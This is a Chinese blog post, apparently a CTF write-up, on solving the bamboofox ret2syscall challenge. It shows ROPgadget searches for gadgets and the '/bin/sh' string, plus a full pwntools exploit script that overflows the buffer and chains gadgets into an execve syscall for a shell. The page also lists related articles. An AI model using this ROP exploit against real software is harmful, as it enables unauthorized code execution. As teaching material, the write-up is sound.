基本ROP之ROPgadget

最新推荐文章于 2024-03-27 01:37:28 发布
最新推荐文章于 2024-03-27 01:37:28 发布
阅读量849 收藏 6
点赞数 1
分类专栏: pwn 文章标签: python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62539372/article/details/129912599
版权

例题: bamboofox 中的 ret2syscall

检查保护机制 堆栈不可执行 随机地址没开

利用gadgets获得shell

把对应获取 shell 的系统调用的参数放到对应的寄存器中,那么我们在执行 int 0x80 就可执行对应的系统调用

ax 0xb

bx bin/sh的地址

cx 0

dx 0

寻找控制 eax 的gadgets

ROPgadget --binary rop --only 'pop|ret' | grep 'eax'

 寻找控制 ebx 的gadgets

ROPgadget --binary rop --only 'pop|ret' | grep 'ebx'

 获得 /bin/sh 字符串对应的地址

ROPgadget --binary rop --string 'bin/sh'

 int 80 的地址

 收集完信息编写脚本

from pwn import *
#p=remote()
p=process('./rop')
pop_ax=0x80bb196
pop_dx_cx_bx=0x0806eb90
sh=0x080be408
int_80=0x08049421
payload=b'a'*112+p32(pop_ax)+p32(0xb)+p32(pop_dx_cx_bx)+p32(0)+p32(0)+p32(sh)+p32(int_80)
p.sendline(payload)
p.interactive()

真珠柚子
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
exrop:自动ROPChain生成
04-23
多余的 Exrop是自动ROP链生成器工具,可以根据给定的二进制文件和约束条件自动构建小工具链 要求: , 目前仅支持x86-64! 特征: 处理单向小工具(jmp reg,call reg) 设置寄存器( rdi=0xxxxxx, rsi=0xxxxxx ) 将寄存器设置为寄存器( rdi=rax ) 写给内存 将字符串/字节写入内存 函数调用( open('/etc/passwd',0) ) 函数调用中的传递寄存器( read('rax', bss, 0x100) ) 避免坏蛋 堆栈Exrop.stack_pivot ( Exrop.stack_pivot ) syscall( Exrop.syscall ) 看 安装 安装python(推荐并测试3.6) 安装triton( ),确保将-DPYTHON36=on添加为cmake选项 安装ropgadget(
PWN中的ROPgadget
LL021101的博客
03-27 3109
文章目录 前言 一、什么时候使用ROP,以及怎么使用 二、平衡栈帧 总结 前言 ROPgadget是一种基于代码复用的一种攻击技术。 一、ROP的使用(其中一种) 我们做pwn的时候,一般我们的目标是找到system函数和“/bin/sh”字符串,但是基本上pwn题是不会让你这么简单就解决了,他会隐藏system函数,和/bin/sh字符串,此时我们就要用到ROP方法。 ROPgadget --binary rop --only 'pop|ret' //单引号中间的...
Ropgadget中ropchain的详细分析
最新发布
流水不争先,争的是滔滔不绝
03-27 1117
通常情况下,由于程序的输入长度有限制,而ROPgadget生成的ropchain过长,导致ropchain无法适用,如果能够针对ropchain进行简单的修改的话,那便能减少构建rop链花费的心思。
rop demo完整用例
07-16
本文是借助maven搭建的一个rop框架,以及一个简单的测试用例,供大家学习分享。如果发现不对的地方,希望大家留言提出,
rop开放平台
04-12
rop开放平台s
kali安装ROPgadget报错.docx
11-18
kali安装ROPgadget报错,pkg_resources.ResolutionError: Script 'scripts/ROPgadget' not found in metadata at '/usr/local/lib/python2.7/dist-packages/ROPGadget-5.9.dist-info'
ROPgadget初识 ——— ret2syscall
qq_41696518的博客
07-01 1125
PWN
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1565
pwn练习1-ret2syscall(ROP-gadget)
ROPR:一款功能强大的极速多线程ROPGadget查找工具
Karka_的博客
08-25 329
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
探秘安全领域利器:`ROPgadget` - 反向工程与漏洞利用的新工具
gitblog_00017的博客
03-22 215
探秘安全领域利器:ROPgadget - 反向工程与漏洞利用的新工具 项目地址:https://gitcode.com/JonathanSalwan/ROPgadget 项目简介 在网络安全的世界里,ROPgadget 是一个非常实用的开源工具,由 Jonathan Salwan 开发并托管在 GitCode 上。它主要用于分析二进制文件,搜索可用于 Return-Oriented Program...
rop轻松谈.pdf
10-21
rop基础
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open Platform的简称,它 的简称,它 不同于一般纯技术型的 不同于一般纯技术型的 不同于一般纯技术型的 不同于一般纯技术型的 不同于一般纯技术型的 不同于一般纯技术型的 Web ServiceWeb Service Web Service Web ServiceWeb ServiceWeb Service 框架(如 CXFCXFCXF,JerseyJersey Jersey Jersey等) ,RopRop 致力于构建 致力于构建 致力于构建 服务开放平台 服务开放平台 服务开放平台 服务开放平台 的框架 的框架 ,您可以使用 ,您可以使用 ,您可以使用 ,您可以使用 RopRop 开发类似于淘宝 开发类似于淘宝 开发类似于淘宝 开发类似于淘宝 服务开放平台 服务开放平台 服务开放平台 这样的服务平台 这样的服务平台 这样的服务平台 这样的服务平台 。RopRopRop充分借鉴了当前大型网站的 充分借鉴了当前大型网站的 充分借鉴了当前大型网站的 充分借鉴了当前大型网站的 充分借鉴了当前大型网站的 充分借鉴了当前大型网站的 服务开放平台 服务开放平台 服务开放平台 的设计思 的设计思 路, 汲取了它们成功的实践经验, 汲取了它们成功的实践经验, 汲取了它们成功的实践经验, 汲取了它们成功的实践经验, 汲取了它们成功的实践经验, 汲取了它们成功的实践经验, 对服务开放平台 服务开放平台 服务开放平台 服务开放平台 的很多应用层领域问题给出了解决方案,开 的很多应用层领域问题给出了解决方案,开 的很多应用层领域问题给出了解决方案,开 的很多应用层领域问题给出了解决方案,开 的很多应用层领域问题给出了解决方案,开 的很多应用层领域问题给出了解决方案,开 的很多应用层领域问题给出了解决方案,开 的很多应用层领域问题给出了解决方案,开 的很多应用层领域问题给出了解决方案,开 的很多应用层领域问题给出了解决方案,开 的很多应用层领域问题给出了解决方案,开 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发者可以直接使用这些解决方案,也在此基础上进行个性化扩展。 发
ROPgadget.zip
09-17
pip install ropgadget下载总是中断的可以试试,pwn必备工具ROPgadget,
BUUCTF-ciscn_2019_ne_51
Rt1Text的博客
10-09 201
根据文件名可知是other shellcode。
【pwn】 cmcc_simplerop
Nothing
02-26 721
例行检查 ida打开二进制文件发现是静态链接的32位程序。main函数中存在溢出。用ROPgadget查找文件中的gadget。 ROPgadget --binary ./simplerop --only 'pop|ret' >> 1.txt 得到 发现存在 pop eax;ret pop edx;pop ecx;pop ebx;ret 这些就足够了,给寄存器赋值再用int 80...
PWN入门之通用gadgets
weixin_44681716的博客
04-09 2716
实验目的 针对一些程序运行时的初始化函数(如加载libc.so的初始化函数),提取一些通用的gadgets,从而更利于我们继续ROP操作。 实验文件 这次实验的可执行文件文件通过我们自己编译一个程序产生,为了降低实验的难度,我们在进行编译的时候,关闭栈保护和数据执行保护(DEP)。 ...
PWN 基础环境配置
weixin_51867085的博客
01-17 1320
一些基础 pwn 环境
ropgadget下载
11-13
ropgadget是一个用于构建ROP(Return Oriented Programming)链的工具,它能够从二进制文件中提取出可供利用的ROP gadgets(即一系列具有特定功能的指令序列)。ROP链是一种在没有执行代码注入的情况下,利用程序中已存在的代码片段来构造攻击的方法。 要下载ropgadget,首先需要确保系统中已经安装了Python和pip(Python的包管理器)。然后可以使用以下命令来安装ropgadget: 1. 打开终端或命令提示符窗口。 2. 输入以下命令并按下回车键:pip install ropgadget 3. 该命令将自动下载并安装ropgadget及其依赖项。 安装完成后,可以使用ropgadget命令来运行该工具。例如,要在名为"binary"的二进制文件中查找ROP gadgets,可以使用以下命令: ropgadget --binary binary 该命令将会在终端输出中显示找到的ROP gadgets的列表,包括每个gadget的地址和指令。 使用ropgadget可以帮助安全研究人员和渗透测试人员更方便地分析目标程序的漏洞,并构建攻击载荷。通过寻找合适的ROP gadgets并组合它们,攻击者可以利用程序本身的代码段来实现特定的攻击目的,比如绕过保护机制、执行特定的系统调用、获取敏感信息等。 总之,ropgadget是一个用于构建ROP链的有用工具,它能够帮助研究人员和攻击者在没有代码注入的情况下进行攻击,因此在进行安全研究和漏洞利用方面具有重要价值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值